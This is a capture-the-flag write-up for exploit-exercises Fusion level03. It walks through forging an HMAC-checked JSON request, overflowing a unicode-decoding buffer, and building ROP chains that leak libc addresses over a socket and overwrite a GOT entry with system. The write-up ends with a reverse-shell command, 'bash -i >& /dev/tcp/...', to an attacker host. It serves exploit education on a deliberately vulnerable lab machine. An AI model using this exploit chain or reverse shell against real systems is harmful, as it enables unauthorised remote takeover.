# Solution for level03

## 0x01 context

This level has NX and ASLR enabled and the binary does not contain any reference to execve or system library that means we need to find a trick to call system function.

I commit many mistakes during the solve of this challenge, so in addition to write the solution, I will try to explain the "thinking" and also share the mistakes.

In addition, it is possible to take some shortcut but in order to learn something i prefered to take the other ways and add some step.


## 0x02 Analyse the binary

### a. Overview

If we read the source code, the following have to be done on the client side :

1. Retrieve the token
2. Send the request with build as `token + request` + mean concatenation and ensure that `hmac(token,token + request)` starts with `\x00\x00` (\*a)
3. request have to be a valid json request
4. research where to overwrite this damn stack ...

\*a) This requirement is defined by the following check
```
HMAC(EVP_sha1(), token, strlen(token), gRequest, gRequestSize, result,
      &len); // hashcash with added hmac goodness

  invalid = result[0] | result[1]; // Not too bad :>
```

Before playing with exploits, we need to craft valid request

### b. Forge the right signature

To sum up with have a json request like below
```
token
{"tags":"aaa" ,"title":"bbbb","contents":"ccc","serverip":"myip"}
```

and we have to compute `hmac(token,request)== \x00\x00.........`

To achieve this, we just have to find a value which satisfy the requirement and respect a json structure. This is done by bruteforcing a value till we get what we want :

```
def checksum(token,init):
    count=0
    prefix=token+'\n'+init
    attempt=prefix

    while (hmac.new(token,attempt,sha1).digest())[:2] != '\x00\x00':
        count+=1
        attempt=prefix+'"junk":"'+n2s(count)+'"}'

    print hmac.new(token,attempt,sha1).hexdigest()
    return attempt,n2s(count)
```

## 0x04 exploit buffer overflow

### a. Spot the injection point

Now, we can submit a valid request, the true challenge starts ... after a first analysis of source code we identify that the length of some inputs user are not checked :

For example, the function `handle_request` where the `Tags` or `serverip` are handled, none verification are performed on the length :

```
if(strcmp(key, "tags") == 0) {
    for(i=0; i < json_object_array_length(val); i++) {
        json_object *obj = json_object_array_get_idx(val, i);
        tags[tag_cnt + i] = json_object_get_string(obj);
    }
    tag_cnt += i;

    [...]

    } else if(strcmp(key, "serverip") == 0) {
        gServerIP = json_object_get_string(val);
    }
```

Lets overflow these ...

![gdb](png/sigsegv2.PNG)

Ok, overflow works but we dont control anything ...

After too many hours wasted, the vulnerability is present in `decode_string` called to parse the json parameter's `title` and `contents`.

```
unsigned char title[128];

else if(strcmp(key, "title") == 0) {
    len = sizeof(title);
    decode_string(json_object_get_string(val), title, &len);

```

We saw that the length is checked, however :

```
void decode_string(const char *src, unsigned char *dest, int *dest_len)
end = dest + *dest_len;

while(*src && dest != end) {

    if(*src == '\\') {
        *src++;

        switch(*src) {
          case 'u':
              src++;

              [...]

              *dest++ = (what >> 8) & 0xff;
              *dest++ = (what & 0xff);
              src += 4;
              break;
```

The function `decode_string` reimplement how to handle the unicode characters, we can see that the pointer of `dest` is increment twice which it invalidates `dest != end`

Lets check the assumption by sending in title *(reminder length of 128)* `"A"*127+\u0000+junk+CCCC `:

![43434343](png/43434343.PNG)

At this step, we control the EIP, the identification of the injection point was a bit painful.

### b. Exploitation

#### b1 - Strategy for exploitation

By checking the function loaded in the binary, we have no system, no execve ... The NX and ASLR are enabled, so the only way i know, it is to overwrite the GOT address of any function by the address of system and jump on its PLT address. *(dig by yourself the got/plt)*

Note : The GOT is writable and not dynamically allocated, RELRO and PIE add these additionnal security features.

So the match plan is the following :

* Leak address of the GOT entry of any function
* Identify the version of libc in order to know the offset of system function
* Overwrite the GOT entry in order to write the system address
* Enjoy the shell ?

Note : ASLR randomize the libc base address but the offset between each function is kept

#### b2 - Exploitation - Leak of libc address

*Disclamer : This part is optional, as you have a direct access on the VM machine you can just get the version of libc address and get the offset of system, but in order to get a full exploitation i prefer deal with the leak :)*


For the moment, we control the EIP, lets start to build our rop chain. First idea was to perform a `write` on the file descriptor `1` to leak address, but it was a nice fail. Indeed, before we control the EIP, all the file descriptor are closed (STDIN, STDOUT, STDERR)

![fdclosed](png/fdclosed.PNG)

Then, the strategy is a bit different :

* Create socket on our remote address
* Connect on the socket
* Write to the socket in order to leak libc address *(GOT)*

Lets study the functions which need to be used :

```
#int socket(int domain, int type, int protocol);
#int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
```

Socket is a no brainer, connect need some reflexion, we have to pass a pointer to the sockaddr structure :

* Need a writable and guessable address
  * The program declare uninitialed variable `unsigned char *gContents;`, so we get our pointer

   ![fdclosed](png/gcontents.PNG)

* Need to pass a well formed structure via `gContents`

 ```
  struct sockaddr {
     unsigned short   sa_family;
     char             sa_data[14];
  };

  struct sockaddr_in {
     short int            sin_family;
     unsigned short int   sin_port;
     struct in_addr       sin_addr;
     unsigned char        sin_zero[8];
  };

  struct in_addr {
     unsigned long s_addr;
  };
  ```

The rop chain is the following with `0x09cdd610+100` point of `gcontents +100` which contains our sockaddr

```
rop.socket(2,1,0)
rop.connect(0,0x09cdd610+100,16)
rop.write(0,fork_got,4)
rop.write(0,strtol_got,4)

sockaddr=struct.pack("H",2)+struct.pack("H",socket.htons(4242))+socket.inet_aton('192.168.0.103')+"\x00"*8
```
Note : initially, i don't use htons and inet_aton but rather just pack the value, it was a mistake, it is **requiered** otherwise the sockaddr is invalid ...

If we put a breakpoint *(just before the `ret` of the vulnerable function)* during the execution of our payload we saw that the sockaddr is correctly set on the stack :

![sockaddr](png/afinetstruct_post_glob_qrticle.PNG)

```
In [424]: struct.pack("H",socket.htons(80))
Out[424]: '\x00P'

#P=0x50 and g=0x67

In [425]: socket.inet_aton('192.168.0.103')
Out[425]: '\xc0\xa8\x00g'

```
The result of our payload give us the following leak

`LEAK : address of libc fork 0xb74df5c0 and libc strtol 0xb7477d00`

Compute the offset with the help of [libcdb.com](http://libcdb.com)

![libc](png/libcversion.PNG)

Ensure that you have the right version of libc by checking the base address with 2 leak address .... i waste some time by playing with the wrong version ...

In addition, in our case, the presence of `\x00` in our payload break the rop chain  example with the following screen no more breakpoint
![rop](png/rop00.PNG)
![null](png/00.PNG)

The solution is to define a function which replace `\x00` by unicode value

```
#function to replace \x00 which breaks the payload to replace by \\u0000
def rep00(rop):
    rop=[rop[i:i+2] for i in range(0,len(rop),2)]
    for ind,ele in enumerate(rop) :
        if b'\x00' in ele:
            rop[ind]='\\\\u'+ele.encode('hex')
    return "".join(rop)
```

Note : I used pwn listen function to open a tcp server, but you will find in the source file `psol_03_thread.py` the implementation by using `socketserver.TCPServer`

#### b3 - Exploitation - Get a shell

In the previous phase, we get the leak of `strtol 0xb7477d00 : offset ` and success to identify the version of libc, it means we know the offset of system address
![syslibc](png/systemoffset.PNG)
![syslibc](png/strtolloffset.PNG)

The strategy to get a shell is straightforward :

* Overwrite the GOT entry for strtol by adding `0x0003cb20-0x00033d00 = 0x8e20`
* Call PLT entry for strtol which is system with the payload (\*)
* Enjoy ?

\* : I stuck a bit by calling GOT in order to exec system, it was a fail because GOT is not executable ... so you have to call via PLT

![secperm](png/PermissiongotPLT.PNG)

What do we need is to overwrite GOT :

* Gadget of type add [ptr], reg

![addreg](png/gadget1add.PNG)
so we need to control ebx and eax

* Gadget of type pop ebx/eax

![popebx](png/gadget2popebx.PNG)
![popeax](png/popeax.PNG)

The main gadget is `add dword [ebx + 0x5d5b0c4], eax` what we need to do is :

* Define eax to the offset `0x8e20`
  * It is mandatory to pad a junk value with a length of 0x5c with our gadget
* Define the ebx to the GOT address of strtol `0x0804bd3c`
  * so `ebx = (0x0804bd3c - 0x5d5b04c4) & 0xffffffff` don't forget that register are 32 bits, that's why it is necessary to apply the mask `0xffffffff`

the rop chain is the following :

```
popebx=p32(0x08048bf0)
popeax=p32(0x08049b4f)
add=p32(0x080493fe)
ebx=p32((0x0804bd3c - 0x5d5b04c4)&0xffffffff)
eax=p32(offset)

#overwrite got strtol with system
payload=popebx
payload+=ebx
payload+=popeax
payload+=eax
payload+="X"*0x5c#junk for add esp,0x5c
payload+=add
```

The last part is easy :

* call PLT of strtol which contains the system adress
* Define our argument of system, for this, we will use the same technique as the writting of sockaddr (see chapter relating to the socket and leak libc)
  * our payload is a reverse bash shell `bash -i >& /dev/tcp/192.168.0.103/4243 0>&1`

Lets run all our rop chain and enjoy the shell

![win](png/win.PNG)

## 0x05 references

* https://exploit-exercises.com/fusion/
* https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
* http://libcdb.com/
